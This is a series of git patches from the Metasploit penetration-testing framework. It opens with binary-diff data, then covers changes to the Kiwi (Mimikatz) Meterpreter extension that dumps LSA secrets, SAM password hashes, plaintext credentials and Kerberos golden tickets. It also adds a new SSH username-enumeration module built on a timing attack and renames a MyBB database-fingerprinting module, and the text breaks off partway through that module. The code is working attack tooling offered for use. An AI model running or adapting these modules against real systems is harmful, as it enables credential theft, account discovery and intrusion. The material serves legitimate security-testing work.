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 diff --git a/data/android/libs/mips/libdalvikstager.so b/data/android/libs/mips/libndkstager.so similarity index 92% rename from data/android/libs/mips/libdalvikstager.so rename to data/android/libs/mips/libndkstager.so index ad370966a9862e32914134b25ecc6d2521a26ae6..973ffe39a721b9eee2ddc9952246fb7508b36ca6 100644 GIT binary patch delta 92 zcmcbhc|mi7D+^CvN_KHcVtQ(kUUB~9P!{dU3XCk98(1c>umkG&jPE9=3dysEuz&I6*pPa;^!6-JlnZrUB zn|zzyfi=L#-_d2W0>>LRK@(;M1`(i6K`54)EX!}sc?`${8F*%LEdOHJE})uOK)ecw zcLDJ!Aif2}uYma1W?6w`M#f{48wKTA&oF_sEEQB{l>ti0Og;-_fh;hY{1wP50kTRq J%L=(O0RV=cKj;7e delta 237 zcmaE&@kC?8UM7K*#GJCs?BbHd^wc7~;(Uh9Cz+fXCkwD>F?vn5W>I4_o}9#@!6-Gk znZrVsntYqxffa20W(AHnY=Rcd3=ASboq|xTFj=##IRF45_YPzL delta 45 ucmdnXx0jDMz?+#xgn@&DgF$0j) Date: Fri, 28 Mar 2014 11:03:03 +1000 Subject: [PATCH 080/853] Fix typo in kiwi help --- lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 8db656180c..6699e6ac37 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -67,7 +67,7 @@ class Console::CommandDispatcher::Kiwi "creds_all" => "Attempt to retrieve all credentials", "golden_ticket_create" => "Attempt to create a golden kerberos ticket", "kerberos_ticket_use" => "Attempt to use a kerberos ticket", - "kerberos_ticket_purge" => "Attempt to purege any in-use kerberos tickets", + "kerberos_ticket_purge" => "Attempt to purge any in-use kerberos tickets", "kerberos_ticket_list" => "Attempt to list all kerberos tickets", "lsa_dump" => "Attempt to dump LSA secrets" } From 65e204e8344ab1155f564b754b6cecc580a93b56 Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 28 Mar 2014 11:03:38 +1000 Subject: [PATCH 081/853] Modify the menu item descriptions --- .../ui/console/command_dispatcher/kiwi.rb | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 6699e6ac37..7b2da80af7 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -58,18 +58,18 @@ class Console::CommandDispatcher::Kiwi # def commands { - "creds_wdigest" => "Attempt to retrieve WDigest creds", - "creds_msv" => "Attempt to retrieve LM/NTLM creds (hashes)", - "creds_livessp" => "Attempt to retrieve LiveSSP creds", - "creds_ssp" => "Attempt to retrieve SSP creds", - "creds_tspkg" => "Attempt to retrieve TsPkg creds", - "creds_kerberos" => "Attempt to retrieve Kerberos creds", - "creds_all" => "Attempt to retrieve all credentials", - "golden_ticket_create" => "Attempt to create a golden kerberos ticket", - "kerberos_ticket_use" => "Attempt to use a kerberos ticket", - "kerberos_ticket_purge" => "Attempt to purge any in-use kerberos tickets", - "kerberos_ticket_list" => "Attempt to list all kerberos tickets", - "lsa_dump" => "Attempt to dump LSA secrets" + "creds_wdigest" => "Retrieve WDigest creds", + "creds_msv" => "Retrieve LM/NTLM creds (hashes)", + "creds_livessp" => "Retrieve LiveSSP creds", + "creds_ssp" => "Retrieve SSP creds", + "creds_tspkg" => "Retrieve TsPkg creds", + "creds_kerberos" => "Retrieve Kerberos creds", + "creds_all" => "Retrieve all credentials", + "golden_ticket_create" => "Create a golden kerberos ticket", + "kerberos_ticket_use" => "Use a kerberos ticket", + "kerberos_ticket_purge" => "Purge any in-use kerberos tickets", + "kerberos_ticket_list" => "List all kerberos tickets", + "lsa_dump" => "Dump LSA secrets" } end From 86ddd24d26475a6876690f5634d670ea9b85e8e5 Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 28 Mar 2014 16:12:51 +1000 Subject: [PATCH 082/853] Update to use Rex::Text and change handling a bit This change also outputs blank creds so that users know which accounts have blank passwords --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 101 +++++------------- .../ui/console/command_dispatcher/kiwi.rb | 53 +++++---- lib/rex/text.rb | 21 ++++ 3 files changed, 76 insertions(+), 99 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 8851551ad9..8a5e7f2855 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -87,8 +87,8 @@ class Kiwi < Extension :major => response.get_tlv_value(TLV_TYPE_KIWI_LSA_VER_MAJ), :minor => response.get_tlv_value(TLV_TYPE_KIWI_LSA_VER_MIN), :compname => response.get_tlv_value(TLV_TYPE_KIWI_LSA_COMPNAME), - :syskey => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_SYSKEY)), - :nt5key => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_NT5KEY)), + :syskey => response.get_tlv_value(TLV_TYPE_KIWI_LSA_SYSKEY), + :nt5key => response.get_tlv_value(TLV_TYPE_KIWI_LSA_NT5KEY), :nt6keys => [], :secrets => [], :samkeys => [] @@ -96,32 +96,29 @@ class Kiwi < Extension response.each(TLV_TYPE_KIWI_LSA_NT6KEY) do |k| result[:nt6keys] << { - :id => to_guid(k.get_tlv_value(TLV_TYPE_KIWI_LSA_KEYID)), - :value => to_hex_string(k.get_tlv_value(TLV_TYPE_KIWI_LSA_KEYVALUE)) + :id => k.get_tlv_value(TLV_TYPE_KIWI_LSA_KEYID), + :value => k.get_tlv_value(TLV_TYPE_KIWI_LSA_KEYVALUE) } end response.each(TLV_TYPE_KIWI_LSA_SECRET) do |s| - r = { - :name => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_NAME), - :service => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_SERV), - :ntlm => to_hex_string(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_NTLM)), - :current => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR), - :old => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD) + result[:secrets] << { + :name => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_NAME), + :service => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_SERV), + :ntlm => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_NTLM), + :current => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR), + :current_raw => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW), + :old => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD), + :old_raw => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW) } - - r[:current] ||= to_hex_dump(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW)) - r[:old] ||= to_hex_dump(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW)) - - result[:secrets] << r end response.each(TLV_TYPE_KIWI_LSA_SAM) do |s| result[:samkeys] << { :rid => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_RID), :user => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_USER), - :ntlm_hash => to_hex_string(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_NTLMHASH)), - :lm_hash => to_hex_string(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_LMHASH)) + :ntlm_hash => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_NTLMHASH), + :lm_hash => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_LMHASH) } end @@ -132,7 +129,7 @@ class Kiwi < Extension # Convert a flag set to a list of string representations for the bit flags # that are set. # - # +flags+ [Integer] - Integer bitmask of Kerberos token flags. + # @param flags [Integer] - Integer bitmask of Kerberos token flags. # # Returns [String] # @@ -154,7 +151,7 @@ class Kiwi < Extension # # List available kerberos tickets. # - # +export+ [Bool] - Set to +true+ to export the content of each ticket + # @param export [Bool] - Set to +true+ to export the content of each ticket # # Returns [Array[Hash]] # @@ -187,7 +184,7 @@ class Kiwi < Extension # # Use the given ticket in the current session. # - # +ticket+ [Array[Byte]] - Content of the Kerberos ticket to use. + # @param icket [Array[Byte]] - Content of the Kerberos ticket to use. # # Returns [Bool] # @@ -212,10 +209,10 @@ class Kiwi < Extension # # Create a new golden kerberos ticket on the target machine and return it. # - # +user+ [String] - Name of the user to create the ticket for. - # +domain+ [String] - Domain name. - # +sid+ [String] - SID of the domain. - # +tgt+ [String] - The kerberos ticket granting token. + # @param user [String] - Name of the user to create the ticket for. + # @param domain [String] - Domain name. + # @param sid [String] - SID of the domain. + # @param tgt [String] - The kerberos ticket granting token. # # Returns [Array[Byte]] # @@ -234,7 +231,7 @@ class Kiwi < Extension # # Scrape passwords from the target machine. # - # +pwd_id+ - ID of the type credential to scrape. + # @param pwd_id - ID of the type credential to scrape. # # Returns [Array[Hash]] # @@ -251,8 +248,8 @@ class Kiwi < Extension :password => r.get_tlv_value(TLV_TYPE_KIWI_PWD_PASSWORD), :auth_hi => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_HI), :auth_lo => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_LO), - :lm => to_hex_string(r.get_tlv_value(TLV_TYPE_KIWI_PWD_LMHASH)), - :ntlm => to_hex_string(r.get_tlv_value(TLV_TYPE_KIWI_PWD_NTLMHASH)) + :lm => r.get_tlv_value(TLV_TYPE_KIWI_PWD_LMHASH), + :ntlm => r.get_tlv_value(TLV_TYPE_KIWI_PWD_NTLMHASH) } end @@ -322,56 +319,6 @@ class Kiwi < Extension scrape_passwords(PWD_ID_SEK_KERBEROS) end -protected - - # - # Convert an array of bytes to a string-based hex dump in the format - # AA BB CC DD EE FF - # - # +bytes+ [Array[Byte]] - Array of bytes to convert. - # - # Returns [String]. - # - def to_hex_dump(bytes) - return nil unless bytes - - bytes.each_byte.map { |b| - b.to_s(16).rjust(2, '0') - }.join(' ') - end - - # - # Convert an array of bytes to a hex string without spaces - # AABBCCDDEEFF - # - # +bytes+ [Array[Byte]] - Array of bytes to convert. - # - # Returns [String]. - # - def to_hex_string(bytes) - return nil unless bytes - bytes.unpack('H*')[0] - end - - # - # Convert an array of bytes to a GUID string - # - # +bytes+ Array of bytes to convert. - # - # Returns [String]. - # - def to_guid(bytes) - return nil unless bytes - s = bytes.unpack('H*')[0] - parts = [ - s[6, 2] + s[4, 2] + s[2, 2] + s[0, 2], - s[10, 2] + s[8, 2], - s[14, 2] + s[12, 2], - s[16, 4], - s[20, 12] - ] - "{#{parts.join('-')}}" - end end end; end; end; end; end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 7b2da80af7..5af48e04bf 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -77,7 +77,7 @@ class Console::CommandDispatcher::Kiwi # Invoke the LSA secret dump on thet target. # def cmd_lsa_dump(*args) - get_privs + check_privs print_status("Dumping LSA secrets") lsa = client.kiwi.lsa_dump @@ -86,9 +86,9 @@ class Console::CommandDispatcher::Kiwi # use within a table so instead we'll dump in a linear fashion print_line("Policy Subsystem : #{lsa[:major]}.#{lsa[:minor]}") if lsa[:major] - print_line("Domain/Computer : #{lsa[:compname]}") if lsa[:compname] - print_line("System Key : #{lsa[:syskey]}") if lsa[:syskey] - print_line("NT5 Key : #{lsa[:nt5key]}") if lsa[:nt5key] + print_line("Domain/Computer : #{lsa[:compname]}") if lsa[:compname] + print_line("System Key : #{to_hex(lsa[:syskey])}") + print_line("NT5 Key : #{to_hex(lsa[:nt5key])}") print_line print_line("NT6 Key Count : #{lsa[:nt6keys].length}") @@ -96,8 +96,8 @@ class Console::CommandDispatcher::Kiwi lsa[:nt6keys].to_enum.with_index(1) do |k, i| print_line index = i.to_s.rjust(2, ' ') - print_line("#{index}. ID : #{k[:id]}") - print_line("#{index}. Value : #{k[:value]}") + print_line("#{index}. ID : #{Rex::Text::to_guid(k[:id])}") + print_line("#{index}. Value : #{to_hex(k[:value])}") end end @@ -109,9 +109,15 @@ class Console::CommandDispatcher::Kiwi index = i.to_s.rjust(2, ' ') print_line("#{index}. Name : #{s[:name]}") print_line("#{index}. Service : #{s[:service]}") if s[:service] - print_line("#{index}. NTLM : #{s[:ntlm]}") if s[:ntlm] - print_line("#{index}. Current : #{s[:current]}") if s[:current] - print_line("#{index}. Old : #{s[:old]}") if s[:old] + print_line("#{index}. NTLM : #{to_hex(s[:ntlm])}") if s[:ntlm] + if s[:current] || s[:current_raw] + current = s[:current] || to_hex(s[:current_raw], ' ') + print_line("#{index}. Current : #{current}") + end + if s[:old] || s[:old_raw] + old = s[:old] || to_hex(s[:old_raw], ' ') + print_line("#{index}. Old : #{old}") + end end end @@ -123,8 +129,8 @@ class Console::CommandDispatcher::Kiwi index = i.to_s.rjust(2, ' ') print_line("#{index}. RID : #{s[:rid]}") print_line("#{index}. User : #{s[:user]}") - print_line("#{index}. LM Hash : #{s[:lm_hash]}") if s[:lm_hash] - print_line("#{index}. NTLM Hash : #{s[:ntlm_hash]}") if s[:ntlm_hash] + print_line("#{index}. LM Hash : #{to_hex(s[:lm_hash])}") + print_line("#{index}. NTLM Hash : #{to_hex(s[:ntlm_hash])}") end end @@ -371,15 +377,9 @@ class Console::CommandDispatcher::Kiwi protected - def get_privs + def check_privs unless system_check - print_status("Attempting to getprivs") - privs = client.sys.config.getprivs - unless privs.include? "SeDebugPrivilege" - print_warning("Did not get SeDebugPrivilege") - else - print_good("Got SeDebugPrivilege") - end + print_warning("Not running as SYSTEM, execution may fail") else print_good("Running as SYSTEM") end @@ -403,7 +403,7 @@ protected # appropriate function on the client that returns the results from Meterpreter. # def scrape_passwords(provider, method) - get_privs + check_privs print_status("Retrieving #{provider} credentials") accounts = method.call @@ -423,8 +423,8 @@ protected acc[:username] || "", acc[:password] || "", "#{acc[:auth_hi]} ; #{acc[:auth_lo]}", - acc[:lm] || "", - acc[:ntlm] || "" + to_hex(acc[:lm] || ""), + to_hex(acc[:ntlm] || "") ] end @@ -432,6 +432,15 @@ protected return true end + # + # Helper function to convert a potentially blank value to hex and have the + # outer spaces stripped + # + def to_hex(value, sep = '') + value ||= "" + Rex::Text::to_hex(value, sep).strip + end + end end diff --git a/lib/rex/text.rb b/lib/rex/text.rb index 9fe170f3b4..c29b3d4ca3 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb @@ -1233,6 +1233,27 @@ module Text "{#{[8,4,4,4,12].map {|a| rand_text_hex(a) }.join("-")}}" end + # + # Convert an array of 16 bytes to a GUID string + # + # @param bytes [Array[Byte]] Array of 16 bytes which represent a GUID + # in the proper order. + # + # Returns [String]. + # + def self.to_guid(bytes) + return nil unless bytes + s = bytes.unpack('H*')[0] + parts = [ + s[6, 2] + s[4, 2] + s[2, 2] + s[0, 2], + s[10, 2] + s[8, 2], + s[14, 2] + s[12, 2], + s[16, 4], + s[20, 12] + ] + "{#{parts.join('-')}}" + end + # # Creates a pattern that can be used for offset calculation purposes. This # routine is capable of generating patterns using a supplied set and a From bca0d603ef1432115e7c5a2f4dba6c875d6000e8 Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Fri, 28 Mar 2014 16:23:48 +0100 Subject: [PATCH 083/853] SSH user enumeration script --- .../auxiliary/scanner/ssh/ssh_enumusers.rb | 169 ++++++++++++++++++ 1 file changed, 169 insertions(+) create mode 100644 modules/auxiliary/scanner/ssh/ssh_enumusers.rb diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb new file mode 100644 index 0000000000..7aacfd7b99 --- /dev/null +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -0,0 +1,169 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Auxiliary::CommandShell + + attr_accessor :ssh_socket, :good_credentials + + THRESHOLD = 10 + + def initialize + super( + 'Name' => 'SSH Username Enumeration', + 'Description' => %q{ + This module uses a time-based attack to enumerate users in a OpenSSH server. + }, + 'Author' => ['kenkeiras'], + 'References' => [], + 'License' => MSF_LICENSE + ) + + register_options( + [ + OptString.new('USER_FILE', + [true, 'File containing usernames, one per line', nil]), + Opt::RPORT(22) + ], self.class + ) + + register_advanced_options( + [ + OptBool.new('SSH_DEBUG', + [false, 'Enable SSH debugging output (Extreme verbosity!)', + false]), + + OptInt.new('SSH_TIMEOUT', + [false, 'Specify the maximum time to negotiate a SSH session', + 10]), + + OptInt.new('RETRY_NUM', + [true , 'The number of attempts to connect to a SSH server' \ + ' for each user', 3]) + ] + ) + + deregister_options('RHOST') + @good_credentials = {} + end + + + def rport + datastore['RPORT'] + end + + def retry_num + datastore['RETRY_NUM'] + end + + + def check_user(ip, user, port) + pass = 'A' * 64_000 + + opt_hash = { + :auth_methods => ['password', 'keyboard-interactive'], + :msframework => framework, + :msfmodule => self, + :port => port, + :disable_agent => true, + :password => pass, + :config => false, + :proxies => datastore['Proxies'] + } + + opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + + start_time = Time.new + + begin + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh_socket = Net::SSH.start(ip, user, opt_hash) + end + + rescue Rex::ConnectionError, Rex::AddressInUse + return :connection_error + + rescue Net::SSH::Disconnect, ::EOFError + return :success + + rescue ::Timeout::Error + return :success + + rescue Net::SSH::Exception + end + + finish_time = Time.new + + if finish_time - start_time > THRESHOLD + return :success + else + return :fail + end + end + + + def do_report(ip, user, port) + report_auth_info( + :host => ip, + :port => rport, + :sname => 'ssh', + :user => user, + :active => true + ) + end + + + def user_list + return File.new(datastore['USER_FILE']).read.split + end + + + def attempt_user(user, ip) + attempt_num = 0 + ret = nil + + while attempt_num <= retry_num and (ret.nil? or ret == :connection_error) + + if attempt_num > 0 + select(nil, nil, nil, 2**attempt_num) + print_debug "Retrying '#{user}' on '#{ip}' due to connection error" + end + + ret = check_user(ip, user, rport) + attempt_num += 1 + end + return ret + end + + + def show_result(attempt_result, user, ip) + case attempt_result + when :success + print_good "User '#{user}' found on #{ip}" + do_report(ip, user, rport) + :next_user + + when :connection_error + print_error "User '#{user}' on #{ip} could not connect" + :abort + + when :fail + print_debug "User '#{user}' not found on #{ip}" + + end + end + + + def run_host(ip) + print_status "Starting scan on #{ip}" + user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) } + end +end From 3a4f983a6f8759c5a6d48bcd788e747ceaff6074 Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Fri, 28 Mar 2014 22:35:19 +0100 Subject: [PATCH 084/853] Add CVE 2006-5229 reference --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 7aacfd7b99..f8f36d63de 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -23,7 +23,10 @@ class Metasploit3 < Msf::Auxiliary This module uses a time-based attack to enumerate users in a OpenSSH server. }, 'Author' => ['kenkeiras'], - 'References' => [], + 'References' => + [ + ['CVE', '2006-5229'] + ], 'License' => MSF_LICENSE ) From b11df0eaf0e095701ba185fc229aaf718b4f02f5 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Fri, 28 Mar 2014 16:47:49 -0700 Subject: [PATCH 085/853] Update and rename myBB_GetTypeDB.rb to mybb_get_type_db.rb --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 133 ------------------- modules/auxiliary/gather/mybb_get_type_db.rb | 129 ++++++++++++++++++ 2 files changed, 129 insertions(+), 133 deletions(-) delete mode 100644 modules/auxiliary/gather/myBB_GetTypeDB.rb create mode 100644 modules/auxiliary/gather/mybb_get_type_db.rb diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb deleted file mode 100644 index 46e0a0ad9a..0000000000 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ /dev/null @@ -1,133 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -class Metasploit3 < Msf::Auxiliary - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'MyBB type database extractor', - 'Description' => %q{ - This module exploits vulnerability in MyBB. - Provide type of database in forum - This affects versions <= 1.6.12 - }, - 'Author' => - [ - # http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii ' # Discovery and Metasploit Module - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] - ], - 'Privileged' => false, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Feb 13 2014')) - - register_options( - [ - OptString.new('TARGETURI', [ true, "MyBB forum directory path", 'http://localhost/forum']) - ], self.class) - end - - def check - begin - - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_raw({ - 'uri' => uri, - 'method' => 'GET',}) - if (req) - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") - return Exploit::CheckCode::Unknown - end - - #Check PhP - php_version = res['X-Powered-By'] - if php_version - php_version = " PHP Version: #{php_version}".ljust(40) - else - php_version = " PHP Version: unknown".ljust(40) - #return Exploit::CheckCode::Unknown # necessary ???? - end - - #Check Web-Server - _Version_server = res['Server'] - if _Version_server - _Version_server = " Server Version: #{_Version_server}".ljust(40) - else - _Version_server = " Server Version: unknown".ljust(40) - end - - #Check forum MyBB - if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) - return Exploit::CheckCode::Detected - else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") - return Exploit::CheckCode::Unknown - end - - - end - - - - def run - uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') - response = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) - if response.nil? - fail_with(Failure::NotFound, "Failed to retrieve webpage.") - end - #Resolve response - if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) - print_good("Database is: PostgreSQL ;)") - elsif response.body.match(/General error\: 1 no such function\: REGEXP/) - print_good("Database is: SQLite ;)") - else - print_status("Database MySQL or this is not forum MyBB or unknown Database") - end - - end -end diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb new file mode 100644 index 0000000000..e20d863f2d --- /dev/null +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -0,0 +1,129 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Determinant Databases MyBB ', + 'Description' => %q{ + Determine the database in the forum. + This affects versions <= 1.6.12 + }, + 'Author' => + [ + #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 + 'Arthur Karmanovskii '#Discovery and Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 